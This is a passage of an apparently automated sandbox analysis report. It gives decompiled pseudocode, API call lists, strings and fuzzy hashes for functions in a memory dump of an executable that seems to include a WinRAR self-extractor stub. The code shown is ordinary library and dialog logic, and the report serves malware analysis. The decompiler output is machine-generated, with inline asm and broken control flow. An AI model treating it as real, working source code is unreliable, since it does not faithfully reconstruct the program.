0x00000000
0x00000000
0x0017c89a
0x0017c89a
0x0017c89d
0x0017c89d
0x0017c8a2
0x0017c8a4
0x0017c8a6
0x0017c8a6
0x0017c8a8
0x0017c8a8
0x00000000
0x0017c7c0
0x0017c7c0
0x0017c7c7
0x0017c7d3
0x0017c7d9
0x0017c7da
0x0017c7db
0x0017c7e0
0x0017c7e3
0x0017c7e5
0x0017c7eb
0x0017c7ed
0x0017c7fb
0x0017c800
0x0017c801
0x0017c801
0x0017c8ab
0x0017c8ab
0x0017c8b3
0x0017c8b8
0x0017c8c2
0x0017c8c9
0x0017c8c9
0x0017c8d6
0x0017c8dd
0x0017c8e2
0x0017c8ea
0x0017c8f6
0x0017c8f6
0x0017c903
0x0017c908
0x0017c910
0x0017c91a
0x0017c927
0x0017c92e
0x0017c92e
0x0017c93a
0x0017c941
0x0017c946
0x0017c94e
0x0017c954
0x0017c955
0x0017c956
0x0017c958
0x0017c958
0x0017c96d
0x0017c972
0x0017c97e
0x0017c980
0x0017c991
0x0017c99e
0x00000000
0x0017c982
0x0017c982
0x0017c98d
0x0017c98f
0x0017c9a3
0x0017c9a3
0x0017c9a5
0x0017c9ab
0x0017c9b1
0x0017c9bf
0x0017c9c4
0x0017c9c5
0x0017c9cd
0x0017c9d2
0x0017c9d9
0x0017c9df
0x0017c9e1
0x0017c9e7
0x0017c9ed
0x0017c9ef
0x0017c9f8
0x0017c9fb
0x0017c9fd
0x0017ca06
0x0017ca09
0x0017ca0f
0x0017ca12
0x0017ca1b
0x0017ca2a
0x0017ca2f
0x0017ca37
0x0017ca39
0x0017ca3a
0x0017ca40
0x0017ca41
0x0017ca43
0x0017ca48
0x0017ca48
0x00000000
0x0017ca37
0x00000000
0x0017c98f
0x0017c980
0x00000000
0x0017ca50
0x0017ca50
0x0017ca53
0x0017ca55
0x0017ca55
0x00000000
0x00000000
0x0017c3cd
0x0017c3cd
0x0017c3d5
0x0017c3db
0x0017c3de
0x0017c402
0x0017c3e0
0x0017c3e0
0x0017c3e3
0x0017c3f6
0x0017c3e5
0x0017c3e5
0x0017c3e7
0x0017c3ec
0x0017c3ec
0x0017c3e3
0x00000000
0x00000000
0x0017c50a
0x0017c50a
0x0017c50b
0x0017c510
0x0017c510
0x0017c510
0x0017c513
0x0017c518
0x0017c51e
0x0017c51e
0x0017c524
0x0017c52a
0x0017c52a
0x00000000
0x00000000
0x0017be58
0x0017be58
0x0017be5d
0x0017be5e
0x0017be5f
0x0017be64
0x0017be6a
0x0017be6d
0x00000000
0x0017be6f
0x0017be6f
0x00000000
0x0017be6f
0x0017be6d
0x0017ca8d
0x0017ca93
0x0017ca9d
0x0017ca9d
0x0017c5b2
0x0017c5b2
0x0017c5b9
0x00000000
0x00000000
0x0017c5bf
0x0017c5bf
0x0017c5c1
0x0017c5c8
0x0017c5d0
0x0017c5d1
0x0017c5d6
0x0017c5d7
0x0017c5d8
0x0017c5da
0x0017c62e
0x0017c62e
0x0017c636
0x0017c644
0x0017c655
0x0017c663
0x0017c663
0x0017c66f
0x0017c674
0x0017c676
0x0017c686
0x0017c690
0x0017c695
0x0017c698
0x00000000
0x0017c69e
0x0017c69e
0x0017c6a3
0x0017c6a3
0x0017c6a5
0x0017c6ac
0x0017c6b2
0x00000000
0x0017c6b2
0x0017c698
0x0017c5dc
0x0017c5de
0x0017c5e0
0x0017c5e7
0x00000000
0x00000000
0x0017c5e9
0x0017c5e9
0x0017c5eb
0x0017c5f1
0x0017c5f1
0x0017c5f1
0x0017c5f5
0x00000000
0x00000000
0x0017c5f7
0x0017c5f7
0x0017c5f8
0x0017c5fe
0x0017c601
0x0017c603
0x0017c606
0x00000000
0x00000000
0x0017c608
0x00000000
0x0017c608
0x0017c60a
0x0017c615
0x0017c61f
0x0017c624
0x0017c624
0x0017c626
0x00000000
0x0017c6b8
0x0017c6b8
0x0017c6bb
0x0017c6c1
0x0017c6c8
0x0017c6ca
0x0017c6ca
0x0017c6d4
0x0017c6d4
0x00000000
0x0017c6bb

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 0017C54A
_swprintf.LIBCMT ref: 0017C57E

Part of subcall function 0016400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0016401D

SetDlgItemTextW.USER32(?,00000066,001A946A), ref: 0017C59E
_wcschr.LIBVCRUNTIME ref: 0017C5D1
EndDialog.USER32(?,00000001), ref: 0017C6B2

Strings

%s%s%u, xrefs: 0017C573

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
String ID: %s%s%u
API String ID: 2892007947-1360425832
Opcode ID: 6c637182be5ca3286e9245f36fcb133c4f86c957e4a6df0ce2f96f6a7f3dd7e3
Instruction ID: 2d921e978a1edc1ec33ac7c2e79943cd318594b3b6710489b526b8fd94ff4000
Opcode Fuzzy Hash: 6c637182be5ca3286e9245f36fcb133c4f86c957e4a6df0ce2f96f6a7f3dd7e3
Instruction Fuzzy Hash: A141C475900618EADB26DBA0DC85EDA7BBCEF19701F1080AAF50DE7160E7719BC4CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00178E62, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 125
memoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00178E62(void* __ecx, void* __edx) {
				void* _t20;
				short* _t24;
				void* _t28;
				signed int _t29;
				intOrPtr _t31;
				intOrPtr* _t38;
				void* _t44;
				void* _t60;
				intOrPtr* _t62;
				short* _t64;
				short* _t66;
				intOrPtr* _t70;
				long _t72;
				void* _t74;
				void* _t75;

				_t60 = __edx;
				_t45 = __ecx;
				_t44 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
					return _t20;
				}
				 *(_t74 + 8) =  *(_t74 + 8) & 0x00000000;
				_t62 =  *((intOrPtr*)(_t74 + 0x1c));
				 *((char*)(_t74 + 0x13)) = E00178D0A(_t62);
				_push(0x200 + E001835B3(_t62) * 2);
				_t24 = E001835D3(_t45);
				_t66 = _t24;
				if(_t66 == 0) {
					L16:
					return _t24;
				}
				E001857E6(_t66, L"<html>");
				E00187168(_t66, L"<head><meta http-equiv=\"content-type\" content=\"text/html; charset=");
				E00187168(_t66, L"utf-8\"></head>");
				_t75 = _t74 + 0x18;
				_t70 = _t62;
				_t28 = 0x20;
				if( *_t62 != _t28) {
					L4:
					_t29 = E001717CE(_t79, _t70, L"<html>", 6);
					asm("sbb al, al");
					_t31 =  ~_t29 + 1;
					 *((intOrPtr*)(_t75 + 0x18)) = _t31;
					if(_t31 != 0) {
						_t62 = _t70 + 0xc;
					}
					E00187168(_t66, _t62);
					if( *((char*)(_t75 + 0x20)) == 0) {
						E00187168(_t66, L"</html>");
					}
					_t82 =  *((char*)(_t75 + 0x13));
					if( *((char*)(_t75 + 0x13)) == 0) {
						_push(_t66);
						_t66 = E00179098(_t60, _t82);
					}
					_t72 = 9 + E001835B3(_t66) * 6;
					_t64 = GlobalAlloc(0x40, _t72);
					if(_t64 != 0) {
						_t13 = _t64 + 3; // 0x3
						if(WideCharToMultiByte(0xfde9, 0, _t66, 0xffffffff, _t13, _t72 - 3, 0, 0) == 0) {
							 *_t64 = 0;
						} else {
							 *_t64 = 0xbbef;
							 *((char*)(_t64 + 2)) = 0xbf;
						}
					}
					L001835CE(_t66);
					_t24 =  *0x1c2178(_t64, 1, _t75 + 0x14);
					if(_t24 >= 0) {
						E00178D41( *((intOrPtr*)(_t44 + 0x10)));
						_t38 =  *((intOrPtr*)(_t75 + 0x10));
						 *0x193260(_t38,  *((intOrPtr*)(_t75 + 0x10)));
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *_t38 + 8))))();
					}
					goto L16;
				} else {
					goto L3;
				}
				do {
					L3:
					_t70 = _t70 + 2;
					_t79 =  *_t70 - _t28;
				} while ( *_t70 == _t28);
				goto L4;
			}

0x00178e62
0x00178e62
0x00178e66
0x00178e6c
0x00178fb3
0x00178fb3
0x00178e72
0x00178e79
0x00178e84
0x00178e94
0x00178e95
0x00178e9a
0x00178ea0
0x00178fad
0x00000000
0x00178fae
0x00178ead
0x00178eb8
0x00178ec3
0x00178ec8
0x00178ecb
0x00178ecf
0x00178ed3
0x00178ede
0x00178ee6
0x00178eed
0x00178eef
0x00178ef1
0x00178ef5
0x00178ef7
0x00178ef7
0x00178efc
0x00178f08
0x00178f10
0x00178f16
0x00178f17
0x00178f1c
0x00178f1e
0x00178f26
0x00178f26
0x00178f32
0x00178f3e
0x00178f42
0x00178f4c
0x00178f61
0x00178f6e
0x00178f63
0x00178f63
0x00178f68
0x00178f68
0x00178f61
0x00178f72
0x00178f80
0x00178f89
0x00178f94
0x00178f99
0x00178fa5
0x00178fab
0x00178fab
0x00000000
0x00000000
0x00000000
0x00000000
0x00178ed5
0x00178ed5
0x00178ed5
0x00178ed8
0x00178ed8
0x00000000

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 00178F38
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00178F59

Strings

<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00178EB2
utf-8"></head>, xrefs: 00178EBD
</html>, xrefs: 00178F0A
<html>, xrefs: 00178EA7, 00178EE0

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocByteCharGlobalMultiWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 3286310052-4209811716
Opcode ID: a5abca2c6d40354745728770dd49edf7217d54b37fced111fdde747c3895775c
Instruction ID: 66a166128176882d7f6250ac6e505d0364b2350c92a2e541d680d479045d2c7f
Opcode Fuzzy Hash: a5abca2c6d40354745728770dd49edf7217d54b37fced111fdde747c3895775c
Instruction Fuzzy Hash: A6317B315483017BDB24BB749C4AFAF7778EF61720F14811AF815971C1EF649B4987A1

Uniqueness

Uniqueness Score: -1.00%

Function 00179635, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E00179635(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
				struct tagRECT _v16;
				intOrPtr _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				intOrPtr _t32;
				struct HWND__* _t43;
				intOrPtr* _t51;
				void* _t58;
				WCHAR* _t65;
				struct HWND__* _t66;

				_t66 = _a8;
				_t51 = __ecx;
				 *(__ecx + 8) = _t66;
				 *((char*)(__ecx + 0x26)) = _a20;
				ShowWindow(_t66, 0);
				E00179344(_t51, _a4);
				if( *((intOrPtr*)(_t51 + 0x1c)) != 0) {
					L001835CE( *((intOrPtr*)(_t51 + 0x1c)));
				}
				if(_a12 != 0) {
					_push(_a12);
					_t32 = E00187107(_t51, _t58);
				} else {
					_t32 = 0;
				}
				 *((intOrPtr*)(_t51 + 0x1c)) = _t32;
				 *((intOrPtr*)(_t51 + 0x20)) = _a16;
				GetWindowRect(_t66,  &_v16);
				 *0x1c2108(0,  *0x1c2154(_t66,  &_v16, 2));
				if( *(_t51 + 4) != 0) {
					 *0x1c2110( *(_t51 + 4));
				}
				_t39 = _v36;
				_t19 = _t39 + 1; // 0x1
				_t43 =  *0x1c2118(0, L"RarHtmlClassName", 0, 0x40000000, _t19, _v36, _v28 - _v36 - 2, _v28 - _v36,  *0x1c2154(_t66, 0,  *_t51, _t51, _t58));
				 *(_t51 + 4) = _t43;
				if( *((intOrPtr*)(_t51 + 0x10)) != 0) {
					__eflags = _t43;
					if(_t43 != 0) {
						ShowWindow(_t43, 5);
						return  *0x1c210c( *(_t51 + 4));
					}
				} else {
					if(_t66 != 0 &&  *((intOrPtr*)(_t51 + 0x20)) == 0) {
						_t75 =  *((intOrPtr*)(_t51 + 0x1c));
						if( *((intOrPtr*)(_t51 + 0x1c)) != 0) {
							_t43 = E0017943C(_t51, _t75,  *((intOrPtr*)(_t51 + 0x1c)));
							_t65 = _t43;
							if(_t65 != 0) {
								ShowWindow(_t66, 5);
								SetWindowTextW(_t66, _t65);
								return L001835CE(_t65);
							}
						}
					}
				}
				return _t43;
			}

0x0017963e
0x00179642
0x00179648
0x0017964b
0x0017964e
0x0017965a
0x00179663
0x00179668
0x0017966d
0x00179673
0x00179679
0x0017967d
0x00179675
0x00179675
0x00179675
0x00179683
0x0017968a
0x00179693
0x001796aa
0x001796b4
0x001796b9
0x001796b9
0x001796bf
0x001796cd
0x001796fa
0x00179700
0x00179707
0x00179741
0x00179743
0x00179748
0x00000000
0x00179751
0x00179709
0x0017970b
0x00179712
0x00179715
0x0017971c
0x00179721
0x00179725
0x0017972a
0x00179732
0x00000000
0x0017973e
0x00179725
0x00179715
0x0017970b
0x0017975d

APIs

ShowWindow.USER32(?,00000000), ref: 0017964E
GetWindowRect.USER32(?,00000000), ref: 00179693
ShowWindow.USER32(?,00000005,00000000), ref: 0017972A
SetWindowTextW.USER32(?,00000000), ref: 00179732
ShowWindow.USER32(00000000,00000005), ref: 00179748

Strings

RarHtmlClassName, xrefs: 001796F4

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: 140e97797c0b4f2af500fbca42234ceea0758329e3a94076436e7b2bb4edda2c
Instruction ID: 9ae3b64b8e6338e1c0841a07ba61cb4722bbbdfffc4492f24c6826cdbe181b03
Opcode Fuzzy Hash: 140e97797c0b4f2af500fbca42234ceea0758329e3a94076436e7b2bb4edda2c
Instruction Fuzzy Hash: 3A31AE31104200AFDB259F64DC48F6B7FB8EF48701F198559FA499A262DB34DA49CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0018BFB5, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0018BFB5(intOrPtr _a4) {
				void* _t18;
				intOrPtr _t45;

				_t45 = _a4;
				if(_t45 != 0) {
					E0018BF79(_t45, 7);
					_t2 = _t45 + 0x1c; // 0x193974
					E0018BF79(_t2, 7);
					_t3 = _t45 + 0x38; // 0x193990
					E0018BF79(_t3, 0xc);
					_t4 = _t45 + 0x68; // 0x1939c0
					E0018BF79(_t4, 0xc);
					_t5 = _t45 + 0x98; // 0x1939f0
					E0018BF79(_t5, 2);
					_t6 = _t45 + 0xa0; // 0x65004d
					E001884DE( *_t6);
					_t7 = _t45 + 0xa4; // 0x6f006d
					E001884DE( *_t7);
					_t8 = _t45 + 0xa8; // 0x790072
					E001884DE( *_t8);
					_t9 = _t45 + 0xb4; // 0x193a0c
					E0018BF79(_t9, 7);
					_t10 = _t45 + 0xd0; // 0x193a28
					E0018BF79(_t10, 7);
					_t11 = _t45 + 0xec; // 0x193a44
					E0018BF79(_t11, 0xc);
					_t12 = _t45 + 0x11c; // 0x193a74
					E0018BF79(_t12, 0xc);
					_t13 = _t45 + 0x14c; // 0x193aa4
					E0018BF79(_t13, 2);
					_t14 = _t45 + 0x154; // 0x76f988da
					E001884DE( *_t14);
					_t15 = _t45 + 0x158; // 0x983e5152
					E001884DE( *_t15);
					_t16 = _t45 + 0x15c; // 0xa831c66d
					E001884DE( *_t16);
					_t17 = _t45 + 0x160; // 0xb00327c8
					return E001884DE( *_t17);
				}
				return _t18;
			}

0x0018bfbb
0x0018bfc0
0x0018bfc9
0x0018bfce
0x0018bfd4
0x0018bfd9
0x0018bfdf
0x0018bfe4
0x0018bfea
0x0018bfef
0x0018bff8
0x0018bffd
0x0018c003
0x0018c008
0x0018c00e
0x0018c013
0x0018c019
0x0018c01e
0x0018c027
0x0018c02c
0x0018c035
0x0018c03d
0x0018c046
0x0018c04b
0x0018c054
0x0018c059
0x0018c062
0x0018c067
0x0018c06d
0x0018c072
0x0018c078
0x0018c07d
0x0018c083
0x0018c088
0x00000000
0x0018c093
0x0018c098

APIs

Part of subcall function 0018BF79: _free.LIBCMT ref: 0018BFA2

_free.LIBCMT ref: 0018C003

Part of subcall function 001884DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0018BFA7,00193958,00000000,00193958,00000000,?,0018BFCE,00193958,00000007,00193958,?,0018C3CB,00193958), ref: 001884F4
Part of subcall function 001884DE: GetLastError.KERNEL32(00193958,?,0018BFA7,00193958,00000000,00193958,00000000,?,0018BFCE,00193958,00000007,00193958,?,0018C3CB,00193958,00193958), ref: 00188506

_free.LIBCMT ref: 0018C00E
_free.LIBCMT ref: 0018C019
_free.LIBCMT ref: 0018C06D
_free.LIBCMT ref: 0018C078
_free.LIBCMT ref: 0018C083
_free.LIBCMT ref: 0018C08E

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
Instruction ID: 344d7a2311cbab9b5b26e899523aa3158c1ca72b570a05ec8521ec7babd9474f
Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
Instruction Fuzzy Hash: 6B111F72944B48FAD620BBB0CC47FCBB79D6F14700F808855B399A6452DB65FA088F94

Uniqueness

Uniqueness Score: -1.00%

Function 001820CA, Relevance: 10.6, APIs: 7, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E001820CA(void* __ecx, void* __edx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t26;
				void* _t29;

				if( *0x19e680 != 0xffffffff) {
					_t26 = GetLastError();
					_t11 = E0018330E(__eflags,  *0x19e680);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E00183348(__eflags,  *0x19e680, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_t29 = E001885A9(_t16, 1, 0x28);
								__eflags = _t29;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E00183348(__eflags,  *0x19e680, 0);
								} else {
									__eflags = E00183348(__eflags,  *0x19e680, _t29);
									if(__eflags != 0) {
										_t11 = _t29;
										_t29 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E001884DE(_t29);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t26);
					return _t11;
				} else {
					return 0;
				}
			}

0x001820d1
0x001820e4
0x001820eb
0x001820ee
0x001820f1
0x0018210a
0x0018210a
0x001820f3
0x001820f3
0x001820f5
0x001820ff
0x00182105
0x00182106
0x00182108
0x00182118
0x0018211c
0x0018211e
0x00182132
0x00182132
0x0018213b
0x00182120
0x0018212e
0x00182130
0x00182144
0x00182146
0x00182146
0x00000000
0x00000000
0x00000000
0x00182130
0x00182149
0x00000000
0x00000000
0x00000000
0x00182108
0x001820f5
0x00182151
0x0018215b
0x001820d3
0x001820d5
0x001820d5

APIs

GetLastError.KERNEL32(?,?,001820C1,0017FB12), ref: 001820D8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001820E6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001820FF
SetLastError.KERNEL32(00000000,?,001820C1,0017FB12), ref: 00182151

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 32ae3800073db4a601d716fc1c89fa9e04b2584ea90461cca9219883e289a3f2
Instruction ID: f194b170c51bab4f43b57402757b26075b69a6d3670be15c52d4a7cc075e3e75
Opcode Fuzzy Hash: 32ae3800073db4a601d716fc1c89fa9e04b2584ea90461cca9219883e289a3f2
Instruction Fuzzy Hash: 2801D432209311AEA6663BB5FCC952A6A88FB31B70B35062BF620554E0EF214F419B44

Uniqueness

Uniqueness Score: -1.00%

Function 0017DC9A, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0017DC9A() {
				intOrPtr _t1;
				_Unknown_base(*)()* _t3;
				void* _t5;
				_Unknown_base(*)()* _t6;
				struct HINSTANCE__* _t14;

				_t1 =  *0x1c0cd0;
				if(_t1 != 1) {
					if(_t1 == 0) {
						_t14 = GetModuleHandleW(L"KERNEL32.DLL");
						if(_t14 != 0) {
							_t3 = GetProcAddress(_t14, "AcquireSRWLockExclusive");
							if(_t3 == 0) {
								goto L5;
							} else {
								 *0x1c0cd4 = _t3;
								_t6 = GetProcAddress(_t14, "ReleaseSRWLockExclusive");
								if(_t6 == 0) {
									goto L5;
								} else {
									 *0x1c0cd8 = _t6;
								}
							}
						} else {
							L5:
							_t14 = 1;
						}
						asm("lock cmpxchg [edx], ecx");
						if(0 != 0 || _t14 != 1) {
							if(0 != 1) {
								_t5 = 1;
							} else {
								goto L12;
							}
						} else {
							L12:
							_t5 = 0;
						}
						return _t5;
					} else {
						return 1;
					}
				} else {
					return 0;
				}
			}

0x0017dc9a
0x0017dca5
0x0017dcad
0x0017dcbf
0x0017dcc3
0x0017dccf
0x0017dcd7
0x00000000
0x0017dcd9
0x0017dcdf
0x0017dce4
0x0017dcec
0x00000000
0x0017dcee
0x0017dcee
0x0017dcee
0x0017dcec
0x0017dcc5
0x0017dcc5
0x0017dcc5
0x0017dcc5
0x0017dcfc
0x0017dd02
0x0017dd0a
0x0017dd10
0x00000000
0x00000000
0x00000000
0x0017dd0c
0x0017dd0c
0x0017dd0c
0x0017dd0c
0x0017dd14
0x0017dcaf
0x0017dcb2
0x0017dcb2
0x0017dca7
0x0017dcaa
0x0017dcaa

Strings

AcquireSRWLockExclusive, xrefs: 0017DCC9
KERNEL32.DLL, xrefs: 0017DCB4
ReleaseSRWLockExclusive, xrefs: 0017DCD9

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 0-1718035505
Opcode ID: e0e2ef59f3a436fb445ca6147d53d4aba67072d69978bbd03b1139d9d604573a
Instruction ID: 513cb1b7dfb61b8a64eab6994b3cdaff65d15d6c61e9ae409e554d2a1109a745
Opcode Fuzzy Hash: e0e2ef59f3a436fb445ca6147d53d4aba67072d69978bbd03b1139d9d604573a
Instruction Fuzzy Hash: 650128316413269B4F735FB4BC816A627B4AF4535232481BEE609E3640EB92C8C1D7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00170CBE, Relevance: 9.1, APIs: 6, Instructions: 94
timeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00170CBE(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				struct _SYSTEMTIME _v44;
				struct _SYSTEMTIME _v60;
				struct _SYSTEMTIME _v76;
				intOrPtr _t47;
				intOrPtr _t61;
				intOrPtr* _t66;
				long _t72;
				intOrPtr _t73;
				intOrPtr* _t76;

				_t73 = __edx;
				_t66 = _a4;
				_t76 = __ecx;
				_v44.wYear =  *_t66;
				_t3 = _t66 + 4; // 0x8b550004
				_v44.wMonth =  *_t3;
				_t5 = _t66 + 8; // 0x48ec83ec
				_v44.wDay =  *_t5;
				_t7 = _t66 + 0xc; // 0x85d8b53
				_v44.wHour =  *_t7;
				_t9 = _t66 + 0x10; // 0xf18b5756
				_v44.wMinute =  *_t9;
				_t11 = _t66 + 0x14; // 0x66038b66
				_v44.wSecond =  *_t11;
				_v44.wMilliseconds = 0;
				_v44.wDayOfWeek = 0;
				if(SystemTimeToFileTime( &_v44,  &_v20) == 0) {
					 *_t76 = 0;
					 *((intOrPtr*)(_t76 + 4)) = 0;
				} else {
					if(E0016ACF5() >= 0x600) {
						FileTimeToSystemTime( &_v20,  &_v60);
						__imp__TzSpecificLocalTimeToSystemTime(0,  &_v60,  &_v76);
						SystemTimeToFileTime( &_v76,  &_v12);
						SystemTimeToFileTime( &_v60,  &_v28);
						_t61 = _v12.dwHighDateTime + _v20.dwHighDateTime;
						asm("sbb eax, [ebp-0x14]");
						asm("sbb eax, edi");
						asm("adc eax, edi");
						_t72 = 0 - _v28.dwLowDateTime + _v12.dwLowDateTime + _v20.dwLowDateTime;
						asm("adc eax, edi");
					} else {
						LocalFileTimeToFileTime( &_v20,  &_v12);
						_t61 = _v12.dwHighDateTime;
						_t72 = _v12.dwLowDateTime;
					}
					 *_t76 = E0017E7E0(_t72, _t61, 0x64, 0);
					 *((intOrPtr*)(_t76 + 4)) = _t73;
				}
				_t36 = _t66 + 0x18; // 0x66d84589
				_t47 =  *_t36;
				 *_t76 =  *_t76 + _t47;
				asm("adc [esi+0x4], edi");
				return _t47;
			}

0x00170cbe
0x00170cc5
0x00170cca
0x00170ccf
0x00170cd3
0x00170cd7
0x00170cdb
0x00170cdf
0x00170ce3
0x00170ce7
0x00170ceb
0x00170cef
0x00170cf3
0x00170cf7
0x00170cfd
0x00170d01
0x00170d15
0x00170da7
0x00170da9
0x00170d1b
0x00170d27
0x00170d47
0x00170d56
0x00170d64
0x00170d72
0x00170d7d
0x00170d82
0x00170d88
0x00170d8d
0x00170d8f
0x00170d92
0x00170d29
0x00170d31
0x00170d37
0x00170d3a
0x00170d3a
0x00170d9e
0x00170da0
0x00170da0
0x00170dac
0x00170dac
0x00170daf
0x00170db1
0x00170dba

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 00170D0D

Part of subcall function 0016ACF5: GetVersionExW.KERNEL32(?), ref: 0016AD1A

LocalFileTimeToFileTime.KERNEL32(?,00170CB8), ref: 00170D31
FileTimeToSystemTime.KERNEL32(?,?), ref: 00170D47
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00170D56
SystemTimeToFileTime.KERNEL32(?,00170CB8), ref: 00170D64
SystemTimeToFileTime.KERNEL32(?,?), ref: 00170D72

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
